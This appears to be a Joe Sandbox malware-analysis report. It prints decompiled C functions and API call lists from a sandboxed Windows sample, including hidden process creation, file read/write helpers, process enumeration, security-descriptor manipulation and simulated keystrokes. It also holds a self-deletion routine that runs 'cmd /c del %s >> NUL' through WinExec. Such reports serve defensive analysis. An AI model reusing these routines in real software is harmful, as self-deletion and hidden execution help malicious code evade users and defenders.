
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: AddressHandleModuleProc$CheckErrorFileLastMapped_memset
String ID: .rsrc$LoadLibraryA$WinExec$kernel32.dll
API String ID: 600805798-1606967582
Opcode ID: 2ac554bc7989aa9a4e5ff4dca74a3989402f897ac6add8a5b302741c2d980b4c
Instruction ID: dc7fb8b82bf7c2dd8e8de4fb95a6a9b7ac571a6e2d358cd3d17ebae733ee5c46
Opcode Fuzzy Hash: 2ac554bc7989aa9a4e5ff4dca74a3989402f897ac6add8a5b302741c2d980b4c
Instruction Fuzzy Hash: 86417C76900309EFCB10EFA4C885AEA7BB8EF08340F514525F916E7251E770D654DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2AF9, Relevance: 16.6, APIs: 11, Instructions: 93
processmemorysynchronizationCOMMON

C-Code - Quality: 80%

			E00DB2AF9(DWORD* _a4, intOrPtr _a8, char _a12) {
				CHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				intOrPtr* _t23;
				char* _t24;
				void* _t45;
				long _t49;

				_t23 = _a4;
				_v8 = 0;
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				_t24 =  &_a12;
				_push(_t24);
				_push(_a8);
				E00DB3E9D();
				_t45 = LocalAlloc(0x40, _t24 + 0x100);
				if(_t45 != 0) {
					_push( &_a12);
					_push(_a8);
					_push(_t45);
					E00DB3E92();
					E00DB3510( &_v24, 0, 0x10);
					_t49 = 0x44;
					E00DB3510( &_v92, 0, _t49);
					_v92.cb = _t49;
					GetStartupInfoA( &_v92);
					_v92.wShowWindow = 0;
					_v92.dwFlags = 1;
					if(CreateProcessA(0, _t45, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24) == 0) {
						GetLastError();
					} else {
						WaitForSingleObject(_v24.hProcess, 0xffffffff);
						if(_a4 != 0) {
							GetExitCodeProcess(_v24.hProcess, _a4);
						}
						CloseHandle(_v24.hThread);
						CloseHandle(_v24);
						_v8 = 1;
					}
					LocalFree(_t45);
					return _v8;
				} else {
					return 0;
				}
			}

0x00db2aff
0x00db2b06
0x00db2b0b
0x00db2b0d
0x00db2b0d
0x00db2b0f
0x00db2b12
0x00db2b13
0x00db2b16
0x00db2b2b
0x00db2b2f
0x00db2b3c
0x00db2b3d
0x00db2b40
0x00db2b41
0x00db2b4d
0x00db2b54
0x00db2b5b
0x00db2b67
0x00db2b6a
0x00db2b72
0x00db2b89
0x00db2b94
0x00db2bc7
0x00db2b96
0x00db2b9b
0x00db2ba4
0x00db2bac
0x00db2bac
0x00db2bbb
0x00db2bc0
0x00db2bc2
0x00db2bc2
0x00db2bce
0x00000000
0x00db2b31
0x00000000
0x00db2b31

APIs

LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00DB2B25
_memset.LIBCMT ref: 00DB2B4D
_memset.LIBCMT ref: 00DB2B5B
GetStartupInfoA.KERNEL32(?), ref: 00DB2B6A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00DB2D96), ref: 00DB2B8C
WaitForSingleObject.KERNEL32(00DB2D96,000000FF), ref: 00DB2B9B
GetExitCodeProcess.KERNEL32(00DB2D96,?), ref: 00DB2BAC
CloseHandle.KERNEL32(00000000), ref: 00DB2BBB
CloseHandle.KERNEL32(00DB2D96), ref: 00DB2BC0
GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00DB2BC7
LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00DB2BCE

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: CloseHandleLocalProcess_memset$AllocCodeCreateErrorExitFreeInfoLastObjectSingleStartupWait
String ID:
API String ID: 3970834964-0
Opcode ID: 85792dada8a0099df694c73600d84028ea98295d55e3fe164b250abe3bad4064
Instruction ID: d5c0bcb14515542c93c6a62882326f94f51ed8bfbc64ab09e2fe09076eaaebb2
Opcode Fuzzy Hash: 85792dada8a0099df694c73600d84028ea98295d55e3fe164b250abe3bad4064
Instruction Fuzzy Hash: 3E217C76900258EBCB11AFE4DC89DEF7BBCEF08751F600616F606E6154DA309A80DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB21ED, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
stringprocessCOMMON

C-Code - Quality: 73%

			E00DB21ED() {
				char _v264;
				char _v524;
				long _t11;

				_t11 = GetModuleFileNameA(0,  &_v264, 0x104);
				if(_t11 != 0) {
					_t11 = GetShortPathNameA( &_v264,  &_v264, 0x104);
					if(_t11 != 0) {
						_push( &_v264);
						_push("/c del %s >> NUL");
						_push( &_v524);
						E00DB3E87();
						_t11 = GetEnvironmentVariableA("ComSpec",  &_v264, 0x104);
						if(_t11 != 0) {
							lstrcatA( &_v264, " ");
							lstrcatA( &_v264,  &_v524);
							return WinExec( &_v264, 0);
						}
					}
				}
				return _t11;
			}

0x00db2206
0x00db220e
0x00db2219
0x00db2221
0x00db2229
0x00db2230
0x00db2235
0x00db2236
0x00db224b
0x00db2253
0x00db2267
0x00db2277
0x00000000
0x00db2282
0x00db2253
0x00db2221
0x00db228a

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622DAA3), ref: 00DB2206
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00DB2219
GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 00DB224B
lstrcatA.KERNEL32(?,00DB11F0), ref: 00DB2267
lstrcatA.KERNEL32(?,?), ref: 00DB2277
WinExec.KERNEL32(?,00000000), ref: 00DB2282

Strings

ComSpec, xrefs: 00DB2246
/c del %s >> NUL, xrefs: 00DB2230

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Namelstrcat$EnvironmentExecFileModulePathShortVariable
String ID: /c del %s >> NUL$ComSpec
API String ID: 4034038632-4153267903
Opcode ID: ccada81a69bf922e2eed3c24427f5051204974f0fcdfffbb7bc216e3561bd20e
Instruction ID: 3b1105eee2378d601f0afd915292009c63fac4aa1f82011f6311a6608b478cab
Opcode Fuzzy Hash: ccada81a69bf922e2eed3c24427f5051204974f0fcdfffbb7bc216e3561bd20e
Instruction Fuzzy Hash: 920104BAD00329EBDB10A7A09D89FDB776C9F14740F440691A646E2140DA70DBC48B71

Uniqueness

Uniqueness Score: -1.00%

Function 00DB250C, Relevance: 12.1, APIs: 8, Instructions: 57
filememoryCOMMON

C-Code - Quality: 100%

			E00DB250C(void* __ecx, long _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _t12;
				void* _t13;
				void* _t19;
				long* _t28;

				_v8 = 0;
				_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_t19 == 0xffffffff) {
					GetLastError();
				} else {
					_t12 = GetFileSize(_t19, 0);
					_t28 = _a12;
					 *_t28 = _t12;
					_t13 = LocalAlloc(0x40, _t12);
					 *_a8 = _t13;
					if(_t13 == 0) {
						GetLastError();
						 *_t28 = 0;
					} else {
						_a4 = 0;
						if(ReadFile(_t19, _t13,  *_t28,  &_a4, 0) == 0) {
							GetLastError();
						} else {
							_v8 = 1;
						}
					}
					CloseHandle(_t19);
				}
				return _v8;
			}

0x00db2523
0x00db252c
0x00db2531
0x00db258c
0x00db2533
0x00db2536
0x00db253c
0x00db2542
0x00db2544
0x00db254d
0x00db2551
0x00db257a
0x00db2580
0x00db2553
0x00db255a
0x00db2567
0x00db2572
0x00db2569
0x00db2569
0x00db2569
0x00db2567
0x00db2583
0x00db2589
0x00db2598

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
CloseHandle.KERNEL32(00000000), ref: 00DB2583
GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorFileLast$AllocCloseCreateHandleLocalReadSize
String ID:
API String ID: 541326989-0
Opcode ID: 6042852f26c1d2fa666eb092c5038f76a4cfc05db097893ddda4a19b1a379c9f
Instruction ID: 89c5d48a2ef23092083837a08f284f7525a968d114d72171c01fa20d271125e0
Opcode Fuzzy Hash: 6042852f26c1d2fa666eb092c5038f76a4cfc05db097893ddda4a19b1a379c9f
Instruction Fuzzy Hash: 5C1127B9900344FFD7206F65DC6CEAB7FB8EB99751F60460CBA43D6290D6719A80CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2822, Relevance: 9.0, APIs: 6, Instructions: 41
processCOMMON

C-Code - Quality: 100%

			E00DB2822(intOrPtr _a4) {
				intOrPtr _v276;
				intOrPtr _v292;
				void* _v300;
				int _t17;
				void* _t18;

				_t17 = 0;
				_t18 = CreateToolhelp32Snapshot(2, 0);
				if(_t18 == 0xffffffff) {
					GetLastError();
				} else {
					_v300 = 0x128;
					if(Process32First(_t18,  &_v300) == 0) {
						GetLastError();
					} else {
						while(_v292 != _a4) {
							if(Process32Next(_t18,  &_v300) != 0) {
								continue;
							} else {
							}
							goto L7;
						}
						_t17 = _v276;
					}
					L7:
					CloseHandle(_t18);
				}
				return _t17;
			}

0x00db282d
0x00db2837
0x00db283c
0x00db288e
0x00db283e
0x00db2846
0x00db2857
0x00db287f
0x00db2859
0x00db2859
0x00db2873
0x00000000
0x00000000
0x00db2875
0x00000000
0x00db2873
0x00db2877
0x00db2877
0x00db2885
0x00db2886
0x00db2886
0x00db2899

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DB2832
Process32First.KERNEL32(00000000,?), ref: 00DB2850
Process32Next.KERNEL32(00000000,00000128), ref: 00DB286C
GetLastError.KERNEL32(00000000,7622D965), ref: 00DB287F
CloseHandle.KERNEL32(00000000), ref: 00DB2886
GetLastError.KERNEL32(00000000,7622D965), ref: 00DB288E

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLastProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3005108968-0
Opcode ID: 9e6ceb100b56e9c4e2e1b77cc03e76231b1d809f0cf1fca677164cdea87c7464
Instruction ID: 4881c1760078506343e193c57037dea264cf7a352281528a5754601ef4e15ff0
Opcode Fuzzy Hash: 9e6ceb100b56e9c4e2e1b77cc03e76231b1d809f0cf1fca677164cdea87c7464
Instruction Fuzzy Hash: ABF0C83B901224EBD7206B698C09EFE77BCDB88361F140154F957D6190DB34DE95CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB24AA, Relevance: 9.0, APIs: 6, Instructions: 40
fileCOMMON

C-Code - Quality: 100%

			E00DB24AA(long _a4, void* _a8, long _a12) {
				void* _t14;
				struct _OVERLAPPED* _t15;

				_t15 = 0;
				_t14 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0, 0);
				if(_t14 == 0xffffffff) {
					GetLastError();
				} else {
					_a4 = 0;
					if(WriteFile(_t14, _a8, _a12,  &_a4, 0) == 0) {
						GetLastError();
					} else {
						_t15 = 1;
					}
					FlushFileBuffers(_t14);
					CloseHandle(_t14);
				}
				return _t15;
			}

0x00db24af
0x00db24c5
0x00db24ca
0x00db24fe
0x00db24cc
0x00db24d4
0x00db24e3
0x00db24e8
0x00db24e5
0x00db24e5
0x00db24e5
0x00db24ef
0x00db24f6
0x00db24f6
0x00db2509

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB24BF
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00DB24DB
GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24E8
FlushFileBuffers.KERNEL32(00000000), ref: 00DB24EF
CloseHandle.KERNEL32(00000000), ref: 00DB24F6
GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24FE

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: File$ErrorLast$BuffersCloseCreateFlushHandleWrite
String ID:
API String ID: 3976640885-0
Opcode ID: d42bf88264b1f1af0d5555f32792c8b43265b0265c1c279248a93c24a5e1d020
Instruction ID: e76e29dd245e9a37b02283d601b1475e05bc0e7df49dfdf9212ad6446228b679
Opcode Fuzzy Hash: d42bf88264b1f1af0d5555f32792c8b43265b0265c1c279248a93c24a5e1d020
Instruction Fuzzy Hash: 9CF0E73A505224FBD7212B6AED5CEEB7E28EB567F2B504215FA0AC1660C6308452D6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2062, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

C-Code - Quality: 100%

			E00DB2062() {
				void* _t1;
				_Unknown_base(*)()* _t3;

				if( *0xdb59f4 == 0) {
					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wvsprintfA");
					 *0xdb59f4 = _t3;
					return _t3;
				}
				return _t1;
			}

0x00db2069
0x00db207c
0x00db2082
0x00000000
0x00db2082
0x00db2087

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00DB2075
GetProcAddress.KERNEL32(00000000), ref: 00DB207C

Strings

user32.dll, xrefs: 00DB2070
wvsprintfA, xrefs: 00DB206B

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: user32.dll$wvsprintfA
API String ID: 2574300362-1331095676
Opcode ID: f6a0156f9df59d0982f104ea266d148bc6664a84edca4314e7e0f7270d714d96
Instruction ID: 35705d664b89b8e9a233b68fe4d08d809a6d7f5832746daf93f616ffb028bf2c
Opcode Fuzzy Hash: f6a0156f9df59d0982f104ea266d148bc6664a84edca4314e7e0f7270d714d96
Instruction Fuzzy Hash: 8CC012BCC02343DECB043B60AD6ABA23AA0A340352F800304A202D8268DA7404448B30

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2088, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

C-Code - Quality: 100%

			E00DB2088() {
				void* _t1;
				_Unknown_base(*)()* _t3;

				if( *0xdb59f8 == 0) {
					_t3 = GetProcAddress(LoadLibraryA("msvcrt.dll"), "_vscprintf");
					 *0xdb59f8 = _t3;
					return _t3;
				}
				return _t1;
			}

0x00db208f
0x00db20a2
0x00db20a8
0x00000000
0x00db20a8
0x00db20ad

APIs

LoadLibraryA.KERNEL32(msvcrt.dll), ref: 00DB209B
GetProcAddress.KERNEL32(00000000), ref: 00DB20A2

Strings

msvcrt.dll, xrefs: 00DB2096
_vscprintf, xrefs: 00DB2091

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: _vscprintf$msvcrt.dll
API String ID: 2574300362-514782248
Opcode ID: 739641149e9b430475518c8c19c6ba9c6245aad15b88abc29c767bbde21ccfd0
Instruction ID: 96a605e918392d6e6c1e4581353b934eb871d531371d9fb5a30be976874fadfc
Opcode Fuzzy Hash: 739641149e9b430475518c8c19c6ba9c6245aad15b88abc29c767bbde21ccfd0
Instruction Fuzzy Hash: 36C012FDC01302DFCB802BA8AC6AB903A60A300392F900224A622E0268D67000848A30

Uniqueness

Uniqueness Score: -1.00%

Function 00DB203C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

C-Code - Quality: 100%

			E00DB203C() {
				void* _t1;
				_Unknown_base(*)()* _t3;

				if( *0xdb59f0 == 0) {
					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wsprintfA");
					 *0xdb59f0 = _t3;
					return _t3;
				}
				return _t1;
			}

0x00db2043
0x00db2056
0x00db205c
0x00000000
0x00db205c
0x00db2061

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00DB204F
GetProcAddress.KERNEL32(00000000), ref: 00DB2056

Strings

user32.dll, xrefs: 00DB204A
wsprintfA, xrefs: 00DB2045

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: user32.dll$wsprintfA
API String ID: 2574300362-4095251970
Opcode ID: 5534c611db5672023ccfef55dd7ec8259f448405067503136d43e07a5ecd17d1
Instruction ID: 6c1c99d635df3d9c9b0844b2985e3743df33ac99333fedb22ce552d2465a1d9c
Opcode Fuzzy Hash: 5534c611db5672023ccfef55dd7ec8259f448405067503136d43e07a5ecd17d1
Instruction Fuzzy Hash: F3C002BDD41742DEDB116B64AC6AB9536A8B704792F840354B613D1368DB7450848A74

Uniqueness

Uniqueness Score: -1.00%

Function 00DB30CD, Relevance: 6.1, APIs: 4, Instructions: 54keyboardCOMMON

APIs

SendInput.USER32(00000001,?,0000001C), ref: 00DB30FF
SendInput.USER32(00000001,?,0000001C), ref: 00DB3114
SendInput.USER32(00000001,?,0000001C), ref: 00DB3127
SendInput.USER32(00000001,?,0000001C), ref: 00DB313A

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: da012e55dd8ca7d1435825243e218e7613479c7800ca521a270346921aa18f37
Instruction ID: e2a41101234043fbde1e124ad1c3e26006e2664bb5a9f4f6cfcc5e4a48740996
Opcode Fuzzy Hash: da012e55dd8ca7d1435825243e218e7613479c7800ca521a270346921aa18f37
Instruction Fuzzy Hash: 5301B771D5021DAAEB00DFA99C42BFFFBBCEF55B50F10501BA604E6190E2B49A418BE5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cnwog.exe PID: 1840 Parent PID: 1628cnwog.exeCOMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.3%
Total number of Nodes:	294
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00D32604, Relevance: 47.4, APIs: 25, Strings: 2, Instructions: 166
memorylibraryloaderCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00D32604(intOrPtr* _a4, void* _a8) {
				void* _v8;
				int _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				short _v24;
				struct _SID_IDENTIFIER_AUTHORITY _v28;
				short _v32;
				struct _SID_IDENTIFIER_AUTHORITY _v36;
				void* _v40;
				intOrPtr _v44;
				int _v48;
				int _v60;
				long _v64;
				char _v68;
				char* _t49;
				void* _t52;
				_Unknown_base(*)()* _t61;
				intOrPtr* _t62;
				struct _ACL* _t82;

				_v28.Value = 0;
				_v24 = 0x100;
				_v16 = 0;
				if(AllocateAndInitializeSid( &_v28, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v16) == 0) {
					GetLastError();
					L22:
					return 0;
				}
				_v12 = 0;
				E00D33510( &_v68, 0, 0x20);
				_v68 = _a8;
				_v40 = _v16;
				_t49 =  &_v68;
				_v64 = 2;
				_v60 = 0;
				_v48 = 0;
				_v44 = 5;
				__imp__SetEntriesInAclA(1, _t49, 0,  &_v12); // executed
				if(_t49 != 0) {
					GetLastError();
					L20:
					FreeSid(_v16);
					goto L22;
				}
				_t52 = LocalAlloc(0x40, 0x14);
				_a8 = _t52;
				if(_t52 == 0) {
					GetLastError();
					L18:
					LocalFree(_v12);
					goto L20;
				}
				E00D33510(_t52, 0, 0x14);
				if(InitializeSecurityDescriptor(_a8, 1) == 0 || SetSecurityDescriptorDacl(_a8, 1, _v12, 0) == 0) {
					GetLastError();
					LocalFree(_a8);
					goto L18;
				} else {
					_v36.Value = 0;
					_v32 = 0x1000;
					_t61 = GetProcAddress(LoadLibraryA("advapi32.dll"), "AddMandatoryAce");
					_v20 = _t61;
					if(_t61 == 0) {
						L15:
						_t62 = _a4;
						 *_t62 = 0xc;
						 *((intOrPtr*)(_t62 + 4)) = _a8;
						 *((intOrPtr*)(_t62 + 8)) = 0;
						return 1;
					}
					_t82 = LocalAlloc(0x40, 0x200);
					if(_t82 == 0) {
						GetLastError();
						goto L15;
					}
					if(InitializeAcl(_t82, 0x200, 2) == 0) {
						L12:
						GetLastError();
						L13:
						LocalFree(_t82);
						goto L15;
					}
					_v8 = 0;
					if(AllocateAndInitializeSid( &_v36, 1, 0x1000, 0, 0, 0, 0, 0, 0, 0,  &_v8) == 0) {
						goto L12;
					}
					_push(_v8);
					_push(1);
					_push(0);
					_push(2);
					_push(_t82);
					if(_v20() == 0 || SetSecurityDescriptorSacl(_a8, 1, _t82, 0) == 0) {
						GetLastError();
						FreeSid(_v8);
						goto L13;
					} else {
						goto L15;
					}
				}
			}

0x00d32621
0x00d32624
0x00d3262a
0x00d32635
0x00d327ce
0x00d327d4
0x00000000
0x00d327d4
0x00d32642
0x00d32645
0x00d3264d
0x00d32656
0x00d3265e
0x00d32664
0x00d3266b
0x00d3266e
0x00d32671
0x00d32678
0x00d32680
0x00d327bd
0x00d327c3
0x00d327c6
0x00000000
0x00d327c6
0x00d32690
0x00d32698
0x00d3269d
0x00d327b0
0x00d327b6
0x00d327b9
0x00000000
0x00d327b9
0x00d326a7
0x00d326bc
0x00d327a3
0x00d327ac
0x00000000
0x00d326d9
0x00d326e3
0x00d326e6
0x00d326f3
0x00d326f9
0x00d326fe
0x00d3278c
0x00d3278c
0x00d32792
0x00d32798
0x00d3279b
0x00000000
0x00d327a0
0x00d3270e
0x00d32712
0x00d32786
0x00000000
0x00d32786
0x00d32720
0x00d32777
0x00d32777
0x00d3277d
0x00d3277e
0x00000000
0x00d3277e
0x00d32738
0x00d32743
0x00000000
0x00000000
0x00d32745
0x00d32748
0x00d3274a
0x00d3274b
0x00d3274d
0x00d32753
0x00d32766
0x00d3276f
0x00000000
0x00000000
0x00000000
0x00000000
0x00d32753

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D322B7,00000000,00000000,00000000), ref: 00D3262D
_memset.LIBCMT ref: 00D32645
SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00D32678
LocalAlloc.KERNEL32(00000040,00000014), ref: 00D32690
_memset.LIBCMT ref: 00D326A7
InitializeSecurityDescriptor.ADVAPI32(00D322B7,00000001), ref: 00D326B4
SetSecurityDescriptorDacl.ADVAPI32(00D322B7,00000001,7622DAA3,00000000), ref: 00D326CB
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D326EC
GetProcAddress.KERNEL32(00000000), ref: 00D326F3
LocalAlloc.KERNEL32(00000040,00000200), ref: 00D3270C
InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00D32718
AllocateAndInitializeSid.ADVAPI32(?,00000001,00001000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,001F0001), ref: 00D3273B
SetSecurityDescriptorSacl.ADVAPI32(00D322B7,00000001,00000000,00000000), ref: 00D3275C
GetLastError.KERNEL32 ref: 00D32766
FreeSid.ADVAPI32(001F0001), ref: 00D3276F
GetLastError.KERNEL32 ref: 00D32777
LocalFree.KERNEL32(00000000), ref: 00D3277E
GetLastError.KERNEL32 ref: 00D32786
GetLastError.KERNEL32 ref: 00D327A3
LocalFree.KERNEL32(00D322B7), ref: 00D327AC
GetLastError.KERNEL32 ref: 00D327B0
LocalFree.KERNEL32(7622DAA3), ref: 00D327B9
GetLastError.KERNEL32 ref: 00D327BD
FreeSid.ADVAPI32(00D322B7), ref: 00D327C6
GetLastError.KERNEL32 ref: 00D327CE

Strings

AddMandatoryAce, xrefs: 00D326D9
advapi32.dll, xrefs: 00D326DE

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLast$FreeLocal$Initialize$DescriptorSecurity$AllocAllocate_memset$AddressDaclEntriesLibraryLoadProcSacl
String ID: AddMandatoryAce$advapi32.dll
API String ID: 922488538-673174713
Opcode ID: 3b17eda184c87a2fa93c0ec89568f42be650c7a07947c3e7b0583bb628d716f3
Instruction ID: f02ec95507a39ab876f41224488f05988762c246a84deec7d32a8a3f14f9b674
Opcode Fuzzy Hash: 3b17eda184c87a2fa93c0ec89568f42be650c7a07947c3e7b0583bb628d716f3
Instruction Fuzzy Hash: B45108B9E0030AAFDB149FA5DC89AEE7BB8FF04751F144029F605E6250D7B48A80DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D329C6, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 106
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00D329C6() {
				int _t32;
				int _t39;
				void* _t47;
				void* _t51;
				int _t57;
				void* _t63;
				void* _t65;

				_t63 = _t65 - 0x78;
				_t57 = 0;
				E00D33510(_t63 - 0x3c, 0, 0x9c);
				 *(_t63 - 0x3c) = 0x9c;
				_t32 = GetVersionExA(_t63 - 0x3c);
				if(_t32 != 0) {
					if( *((intOrPtr*)(_t63 - 0x2c)) != 2 ||  *((intOrPtr*)(_t63 - 0x38)) < 6) {
						__imp__#680();
					} else {
						 *(_t63 + 0x74) = 0;
						if(OpenProcessToken(GetCurrentProcess(), 8, _t63 + 0x74) == 0) {
							GetLastError();
							goto L18;
						} else {
							 *(_t63 + 0x68) = 0;
							_t39 = GetTokenInformation( *(_t63 + 0x74), 0x12, _t63 + 0x60, 4, _t63 + 0x68); // executed
							if(_t39 != 0) {
								if( *(_t63 + 0x60) != 3) {
									__imp__#680();
									_t57 = _t39;
									goto L16;
								} else {
									 *(_t63 + 0x70) = 0;
									if(GetTokenInformation( *(_t63 + 0x74), 0x13, _t63 + 0x70, 4, _t63 + 0x68) == 0) {
										goto L7;
									} else {
										_t47 = _t63 - 0x80;
										 *((intOrPtr*)(_t63 + 0x64)) = 0x44;
